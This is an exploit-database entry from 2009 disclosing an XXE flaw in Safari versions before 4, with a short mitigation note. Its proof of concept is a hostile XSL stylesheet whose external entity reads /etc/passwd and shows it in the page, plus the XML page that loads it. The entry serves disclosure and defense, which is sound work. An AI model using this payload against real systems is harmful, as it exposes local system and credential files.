header-logo
Suggest Exploit
vendor:
Safari
by:
Chris
7,5
CVSS
HIGH
XXE attack
611
CWE
Product Name: Safari
Affected Version From: Safari prior to version 4
Affected Version To: Safari version 4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Safari prior to version 4 may permit an evil web page to steal files from the local system

Safari prior to version 4 may permit an evil web page to steal files from the local system. This is accomplished by mounting an XXE attack against the parsing of the XSL XML. To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet.

Mitigation:

Ensure that the application is not vulnerable to XXE attacks by disabling external entity references and DTDs.
Source

Exploit-DB raw data:

Safari prior to version 4 may permit an evil web page to steal files
from the local system.

This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>

Full technical details: http://scary.beasts.org/security/CESA-2009-006.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)

Cheers
Chris

# milw0rm.com [2009-06-09]

Navigation

Suggest Exploit

Services By CQR